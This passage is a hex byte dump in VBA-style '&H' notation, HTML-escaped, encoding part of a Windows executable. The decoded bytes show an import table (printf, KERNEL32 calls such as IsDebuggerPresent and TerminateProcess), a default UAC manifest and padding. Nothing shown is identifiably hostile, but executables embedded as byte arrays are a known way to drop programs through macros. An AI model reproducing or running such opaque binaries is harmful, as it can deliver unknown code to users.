00&amp;H00&amp;H00&amp;H00&amp;HD8&amp;HFF&amp;HFF&amp;HFF&amp;H00&amp;H00&amp;H00&amp;H00&amp;HFE&amp;HFF&amp;HFF&amp;HFF&amp;HEB&amp;H16&amp;H40&amp;H00&amp;HFE&amp;H16&amp;H40&amp;H00&amp;HE4&amp;H22&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H64&amp;H23&amp;H00&amp;H00&amp;H44&amp;H20&amp;H00&amp;H00&amp;HA0&amp;H22&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H18&amp;H26&amp;H00&amp;H00&amp;H00&amp;H20&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;HE
8&amp;H25&amp;H00&amp;H00&amp;HD2&amp;H25&amp;H00&amp;H00&amp;HC2&amp;H25&amp;H00&amp;H00&amp;HA8&amp;H25&amp;H00&amp;H00&amp;H98&amp;H25&amp;H00&amp;H00&amp;H84&amp;H25&amp;H00&amp;H00&amp;H66&amp;H25&amp;H00&amp;H00&amp;H4A&amp;H25&amp;H00&amp;H00&amp;H36&amp;H25&amp;H00&amp;H00&amp;H22&amp;H25&amp;H00&amp;H00&amp;H12&amp;H25&amp;H00&amp;H00&amp;HFC&amp;H24&amp;H00&amp;H00&amp;HDE&amp;H24&amp;H00&amp;H00&amp;HD6&amp;H24&amp;H00&amp;H00&amp;HC0&amp;H24&amp;H00&amp;H00&amp;HFE&amp;H25&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H46&amp;H24&amp;H00&amp;H00&amp;H5A&amp;H24&amp;H00&amp;H00&amp;H64&amp;H24&amp;H00&amp;H00&amp;H30&amp;H24&amp;H00&amp;H00&amp;H7A&amp;H24&amp;H00&amp;H00&amp;H84&amp;H24&amp;H00&amp;H00&amp;H9E&amp;H24&amp;H00&amp;H00&amp;HB0&amp;H24&amp;H00&amp;H00&amp;H1E&amp;H24&amp;H00&amp;H00&amp;H14&amp;H24&amp;H00&amp;H00&amp;H08&amp;H24&amp;H00&amp;H00&amp;HF4&amp;H23&amp;H00&amp;H00&amp;HDE&amp;H23&amp;H00&amp;H00&amp;HD0&amp;H23&amp;H00&amp;H00&amp;HC4&amp;H23&amp;H00&amp;H00&amp;HB8&amp;H23&amp;H00&amp;H00&amp;HB0&amp;H23&amp;H00&amp;H00&amp;HA2&amp;H23&amp;H00&amp;H00&amp;H9A&amp;H23&amp;H00&amp;H00&amp;H90&amp;H23&amp;H00&amp;H00&amp;H80&amp;H23&amp;H00&amp;H00&amp;H72&amp;H23&amp;H00&amp;H00&amp;H5A&amp;H23&amp;H00&amp;H00&amp;H72&amp;H24&amp;H00&amp;H00&amp;H50&amp;H23&amp;H00&amp;H00&amp;H26&amp;H26&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;HEF&amp;H05&amp;H73&amp;H70&amp;H72&amp;H69&amp;H6E&amp;H74&amp;H66&amp;H00&amp;HD7&amp;H05&amp;H70&amp;H72&amp;H69&amp;H6E&amp;H74&amp;H66&amp;H00&amp;H00&amp;H4D&amp;H53&amp;H56&amp;H43&amp;H52&amp;H31&amp;H30&amp;H30&amp;H2E&amp;H64&amp;H6C&amp;H6C&amp;H00&amp;H00&amp;HC5&amp;H01&amp;H5F&amp;H61&amp;H6D&amp;H73&amp;H67&amp;H5F&amp;H65&amp;H78&amp;H69&amp;H74&amp;H00&amp;H00&amp;H63&amp;H01&amp;H5F&amp;H5F&amp;H67&amp;H65&amp;H74&amp;H6D&amp;H61&amp;H69&amp;H6E&amp;H61&amp;H72&amp;H67&amp;H73&amp;H00&amp;HDC&amp;H01&amp;H5F&amp;H63&amp;H65&amp;H78&amp;H69&amp;H74&amp;H00&amp;H00&amp;H2A&amp;H02&amp;H5F&amp;H65&amp;H78&amp;H69&amp;H
74&amp;H00&amp;H2D&amp;H01&amp;H5F&amp;H58&amp;H63&amp;H70&amp;H74&amp;H46&amp;H69&amp;H6C&amp;H74&amp;H65&amp;H72&amp;H00&amp;H73&amp;H05&amp;H65&amp;H78&amp;H69&amp;H74&amp;H00&amp;H00&amp;H64&amp;H01&amp;H5F&amp;H5F&amp;H69&amp;H6E&amp;H69&amp;H74&amp;H65&amp;H6E&amp;H76&amp;H00&amp;HB0&amp;H02&amp;H5F&amp;H69&amp;H6E&amp;H69&amp;H74&amp;H74&amp;H65&amp;H72&amp;H6D&amp;H00&amp;HB1&amp;H02&amp;H5F&amp;H69&amp;H6E&amp;H69&amp;H74&amp;H74&amp;H65&amp;H72&amp;H6D&amp;H5F&amp;H65&amp;H00&amp;HEC&amp;H01&amp;H5F&amp;H63&amp;H6F&amp;H6E&amp;H66&amp;H69&amp;H67&amp;H74&amp;H68&amp;H72&amp;H65&amp;H61&amp;H64&amp;H6C&amp;H6F&amp;H63&amp;H61&amp;H6C&amp;H65&amp;H00&amp;HA2&amp;H01&amp;H5F&amp;H5F&amp;H73&amp;H65&amp;H74&amp;H75&amp;H73&amp;H65&amp;H72&amp;H6D&amp;H61&amp;H74&amp;H68&amp;H65&amp;H72&amp;H72&amp;H00&amp;H00&amp;HEB&amp;H01&amp;H5F&amp;H63&amp;H6F&amp;H6D&amp;H6D&amp;H6F&amp;H64&amp;H65&amp;H00&amp;H00&amp;H45&amp;H02&amp;H5F&amp;H66&amp;H6D&amp;H6F&amp;H64&amp;H65&amp;H00&amp;H00&amp;H9F&amp;H01&amp;H5F&amp;H5F&amp;H73&amp;H65&amp;H74&amp;H5F&amp;H61&amp;H70&amp;H70&amp;H5F&amp;H74&amp;H79&amp;H70&amp;H65&amp;H00&amp;H00&amp;HFB&amp;H01&amp;H5F&amp;H63&amp;H72&amp;H74&amp;H5F&amp;H64&amp;H65&amp;H62&amp;H75&amp;H67&amp;H67&amp;H65&amp;H72&amp;H5F&amp;H68&amp;H6F&amp;H6F&amp;H6B&amp;H00&amp;H00&amp;H02&amp;H01&amp;H3F&amp;H74&amp;H65&amp;H72&amp;H6D&amp;H69&amp;H6E&amp;H61&amp;H74&amp;H65&amp;H40&amp;H40&amp;H59&amp;H41&amp;H58&amp;H58&amp;H5A&amp;H00&amp;H8D&amp;H04&amp;H5F&amp;H75&amp;H6E&amp;H6C&amp;H6F&amp;H63&amp;H6B&amp;H00&amp;H5B&amp;H01&amp;H5F&amp;H5F&amp;H64&amp;H6C&amp;H6C&amp;H6F&amp;H6E&amp;H65&amp;H78&amp;H69&amp;H74&amp;H00&amp;H23&amp;H03&amp;H5F&amp;H6C&amp;H6F&amp;H63&amp;H6B&amp;H00&amp;HC9&amp;H03&amp;H5F&amp;H6F&amp;H6E&amp;H65&amp;H78&amp;H69&amp;H74&amp;H00&amp;H21&amp;H02&amp;H5F&amp;H65&amp;H78&amp;H63&amp;H65&amp;H70&amp;H74&amp;H5F&amp;H68&amp;H61&amp;H6E&amp;H64&amp;H6C&amp;H65&amp;H72&amp;H34&amp;H5F&amp;H63&amp;H6F&amp;H6D&amp;H6D&amp;H6F&amp;H6E&amp;H00&amp;HB8&amp;H02&amp;
H5F&amp;H69&amp;H6E&amp;H76&amp;H6F&amp;H6B&amp;H65&amp;H5F&amp;H77&amp;H61&amp;H74&amp;H73&amp;H6F&amp;H6E&amp;H00&amp;H00&amp;HEF&amp;H01&amp;H5F&amp;H63&amp;H6F&amp;H6E&amp;H74&amp;H72&amp;H6F&amp;H6C&amp;H66&amp;H70&amp;H5F&amp;H73&amp;H00&amp;H00&amp;HEC&amp;H02&amp;H49&amp;H6E&amp;H74&amp;H65&amp;H72&amp;H6C&amp;H6F&amp;H63&amp;H6B&amp;H65&amp;H64&amp;H45&amp;H78&amp;H63&amp;H68&amp;H61&amp;H6E&amp;H67&amp;H65&amp;H00&amp;HB2&amp;H04&amp;H53&amp;H6C&amp;H65&amp;H65&amp;H70&amp;H00&amp;HE9&amp;H02&amp;H49&amp;H6E&amp;H74&amp;H65&amp;H72&amp;H6C&amp;H6F&amp;H63&amp;H6B&amp;H65&amp;H64&amp;H43&amp;H6F&amp;H6D&amp;H70&amp;H61&amp;H72&amp;H65&amp;H45&amp;H78&amp;H63&amp;H68&amp;H61&amp;H6E&amp;H67&amp;H65&amp;H00&amp;H00&amp;HD3&amp;H02&amp;H48&amp;H65&amp;H61&amp;H70&amp;H53&amp;H65&amp;H74&amp;H49&amp;H6E&amp;H66&amp;H6F&amp;H72&amp;H6D&amp;H61&amp;H74&amp;H69&amp;H6F&amp;H6E&amp;H00&amp;H00&amp;HEA&amp;H00&amp;H45&amp;H6E&amp;H63&amp;H6F&amp;H64&amp;H65&amp;H50&amp;H6F&amp;H69&amp;H6E&amp;H74&amp;H65&amp;H72&amp;H00&amp;HC0&amp;H04&amp;H54&amp;H65&amp;H72&amp;H6D&amp;H69&amp;H6E&amp;H61&amp;H74&amp;H65&amp;H50&amp;H72&amp;H6F&amp;H63&amp;H65&amp;H73&amp;H73&amp;H00&amp;H00&amp;HC0&amp;H01&amp;H47&amp;H65&amp;H74&amp;H43&amp;H75&amp;H72&amp;H72&amp;H65&amp;H6E&amp;H74&amp;H50&amp;H72&amp;H6F&amp;H63&amp;H65&amp;H73&amp;H73&amp;H00&amp;HD3&amp;H04&amp;H55&amp;H6E&amp;H68&amp;H61&amp;H6E&amp;H64&amp;H6C&amp;H65&amp;H64&amp;H45&amp;H78&amp;H63&amp;H65&amp;H70&amp;H74&amp;H69&amp;H6F&amp;H6E&amp;H46&amp;H69&amp;H6C&amp;H74&amp;H65&amp;H72&amp;H00&amp;H00&amp;HA5&amp;H04&amp;H53&amp;H65&amp;H74&amp;H55&amp;H6E&amp;H68&amp;H61&amp;H6E&amp;H64&amp;H6C&amp;H65&amp;H64&amp;H45&amp;H78&amp;H63&amp;H65&amp;H70&amp;H74&amp;H69&amp;H6F&amp;H6E&amp;H46&amp;H69&amp;H6C&amp;H74&amp;H65&amp;H72&amp;H00&amp;H00&amp;H03&amp;H49&amp;H73&amp;H44&amp;H65&amp;H62&amp;H75&amp;H67&amp;H67&amp;H65&amp;H72&amp;H50&amp;H72&amp;H65&amp;H73&amp;H65&amp;H6E&amp;H74&amp;H00&amp;HCA&amp;H00&amp;H44&amp;H65&amp;H63&amp;H6F&amp;H64&amp;H65
&amp;H50&amp;H6F&amp;H69&amp;H6E&amp;H74&amp;H65&amp;H72&amp;H00&amp;HA7&amp;H03&amp;H51&amp;H75&amp;H65&amp;H72&amp;H79&amp;H50&amp;H65&amp;H72&amp;H66&amp;H6F&amp;H72&amp;H6D&amp;H61&amp;H6E&amp;H63&amp;H65&amp;H43&amp;H6F&amp;H75&amp;H6E&amp;H74&amp;H65&amp;H72&amp;H00&amp;H93&amp;H02&amp;H47&amp;H65&amp;H74&amp;H54&amp;H69&amp;H63&amp;H6B&amp;H43&amp;H6F&amp;H75&amp;H6E&amp;H74&amp;H00&amp;H00&amp;HC5&amp;H01&amp;H47&amp;H65&amp;H74&amp;H43&amp;H75&amp;H72&amp;H72&amp;H65&amp;H6E&amp;H74&amp;H54&amp;H68&amp;H72&amp;H65&amp;H61&amp;H64&amp;H49&amp;H64&amp;H00&amp;H00&amp;HC1&amp;H01&amp;H47&amp;H65&amp;H74&amp;H43&amp;H75&amp;H72&amp;H72&amp;H65&amp;H6E&amp;H74&amp;H50&amp;H72&amp;H6F&amp;H63&amp;H65&amp;H73&amp;H73&amp;H49&amp;H64&amp;H00&amp;H79&amp;H02&amp;H47&amp;H65&amp;H74&amp;H53&amp;H79&amp;H73&amp;H74&amp;H65&amp;H6D&amp;H54&amp;H69&amp;H6D&amp;H65&amp;H41&amp;H73&amp;H46&amp;H69&amp;H6C&amp;H65&amp;H54&amp;H69&amp;H6D&amp;H65&amp;H00&amp;H4B&amp;H45&amp;H52&amp;H4E&amp;H45&amp;H4C&amp;H33&amp;H32&amp;H2E&amp;H64&amp;H6C&amp;H6C&amp;H00&amp;H00&amp;HD3&amp;H05&amp;H6D&amp;H65&amp;H6D&amp;H73&amp;H65&amp;H74&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H0
0&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H
00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H4E&amp;HE6&amp;H40&amp;HBB&amp;HB1&amp;H19&amp;HBF&amp;H44&amp;HFF&amp;HFF&amp;HFF&amp;HFF&amp;HFF&amp;HFF&amp;HFF&amp;HFF&amp;HFE&amp;HFF&amp;HFF&amp;HFF&amp;H01&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;
H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00
&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H04&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H01&amp;H00&amp;H18&amp;H00&amp;H00&amp;H00&amp;H18&amp;H00&amp;H00&amp;H80&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H04&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H01&amp;H00&amp;H01&amp;H00&amp;H00&amp;H00&amp;H30&amp;H00&amp;H00&amp;H80&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H04&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H01&amp;H00&amp;H09&amp;H04&amp;H00&amp;H00&amp;H48&amp;H00&amp;H00&amp;H00&amp;H58&amp;H40&amp;H00&amp;H00&amp;H5A&amp;H01&amp;H00&amp;H00&amp;HE4&amp;H04&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H3C&amp;H61&amp;H73&amp;H73&amp;H65&amp;H6D&amp;H62&amp;H6C&amp;H79&amp;H20&amp;H78&amp;H6D&amp;H6C&amp;H6E&amp;H73&amp;H3D&amp;H22&amp;H75&amp;H72&amp;H6E&amp;H3A&amp;H73&amp;H63&amp;H68&amp;H6
5&amp;H6D&amp;H61&amp;H73&amp;H2D&amp;H6D&amp;H69&amp;H63&amp;H72&amp;H6F&amp;H73&amp;H6F&amp;H66&amp;H74&amp;H2D&amp;H63&amp;H6F&amp;H6D&amp;H3A&amp;H61&amp;H73&amp;H6D&amp;H2E&amp;H76&amp;H31&amp;H22&amp;H20&amp;H6D&amp;H61&amp;H6E&amp;H69&amp;H66&amp;H65&amp;H73&amp;H74&amp;H56&amp;H65&amp;H72&amp;H73&amp;H69&amp;H6F&amp;H6E&amp;H3D&amp;H22&amp;H31&amp;H2E&amp;H30&amp;H22&amp;H3E&amp;H0D&amp;H0A&amp;H20&amp;H20&amp;H3C&amp;H74&amp;H72&amp;H75&amp;H73&amp;H74&amp;H49&amp;H6E&amp;H66&amp;H6F&amp;H20&amp;H78&amp;H6D&amp;H6C&amp;H6E&amp;H73&amp;H3D&amp;H22&amp;H75&amp;H72&amp;H6E&amp;H3A&amp;H73&amp;H63&amp;H68&amp;H65&amp;H6D&amp;H61&amp;H73&amp;H2D&amp;H6D&amp;H69&amp;H63&amp;H72&amp;H6F&amp;H73&amp;H6F&amp;H66&amp;H74&amp;H2D&amp;H63&amp;H6F&amp;H6D&amp;H3A&amp;H61&amp;H73&amp;H6D&amp;H2E&amp;H76&amp;H33&amp;H22&amp;H3E&amp;H0D&amp;H0A&amp;H20&amp;H20&amp;H20&amp;H20&amp;H3C&amp;H73&amp;H65&amp;H63&amp;H75&amp;H72&amp;H69&amp;H74&amp;H79&amp;H3E&amp;H0D&amp;H0A&amp;H20&amp;H20&amp;H20&amp;H20&amp;H20&amp;H20&amp;H3C&amp;H72&amp;H65&amp;H71&amp;H75&amp;H65&amp;H73&amp;H74&amp;H65&amp;H64&amp;H50&amp;H72&amp;H69&amp;H76&amp;H69&amp;H6C&amp;H65&amp;H67&amp;H65&amp;H73&amp;H3E&amp;H0D&amp;H0A&amp;H20&amp;H20&amp;H20&amp;H20&amp;H20&amp;H20&amp;H20&amp;H20&amp;H3C&amp;H72&amp;H65&amp;H71&amp;H75&amp;H65&amp;H73&amp;H74&amp;H65&amp;H64&amp;H45&amp;H78&amp;H65&amp;H63&amp;H75&amp;H74&amp;H69&amp;H6F&amp;H6E&amp;H4C&amp;H65&amp;H76&amp;H65&amp;H6C&amp;H20&amp;H6C&amp;H65&amp;H76&amp;H65&amp;H6C&amp;H3D&amp;H22&amp;H61&amp;H73&amp;H49&amp;H6E&amp;H76&amp;H6F&amp;H6B&amp;H65&amp;H72&amp;H22&amp;H20&amp;H75&amp;H69&amp;H41&amp;H63&amp;H63&amp;H65&amp;H73&amp;H73&amp;H3D&amp;H22&amp;H66&amp;H61&amp;H6C&amp;H73&amp;H65&amp;H22&amp;H3E&amp;H3C&amp;H2F&amp;H72&amp;H65&amp;H71&amp;H75&amp;H65&amp;H73&amp;H74&amp;H65&amp;H64&amp;H45&amp;H78&amp;H65&amp;H63&amp;H75&amp;H74&amp;H69&amp;H6F&amp;H6E&amp;H4C&amp;H65&amp;H76&amp;H65&amp;H6C&amp;H3E&amp;H0D&amp;H0A&amp;H20&amp;H20&amp;H20&amp;H20&amp;H20&amp;H20&amp;H3C&amp;H2F&amp;H
72&amp;H65&amp;H71&amp;H75&amp;H65&amp;H73&amp;H74&amp;H65&amp;H64&amp;H50&amp;H72&amp;H69&amp;H76&amp;H69&amp;H6C&amp;H65&amp;H67&amp;H65&amp;H73&amp;H3E&amp;H0D&amp;H0A&amp;H20&amp;H20&amp;H20&amp;H20&amp;H3C&amp;H2F&amp;H73&amp;H65&amp;H63&amp;H75&amp;H72&amp;H69&amp;H74&amp;H79&amp;H3E&amp;H0D&amp;H0A&amp;H20&amp;H20&amp;H3C&amp;H2F&amp;H74&amp;H72&amp;H75&amp;H73&amp;H74&amp;H49&amp;H6E&amp;H66&amp;H6F&amp;H3E&amp;H0D&amp;H0A&amp;H3C&amp;H2F&amp;H61&amp;H73&amp;H73&amp;H65&amp;H6D&amp;H62&amp;H6C&amp;H79&amp;H3E&amp;H50&amp;H41&amp;H50&amp;H41&amp;H44&amp;H44&amp;H49&amp;H4E&amp;H47&amp;H58&amp;H58&amp;H50&amp;H41&amp;H44&amp;H44&amp;H49&amp;H4E&amp;H47&amp;H50&amp;H41&amp;H44&amp;H44&amp;H49&amp;H4E&amp;H47&amp;H58&amp;H58&amp;H50&amp;H41&amp;H44&amp;H44&amp;H49&am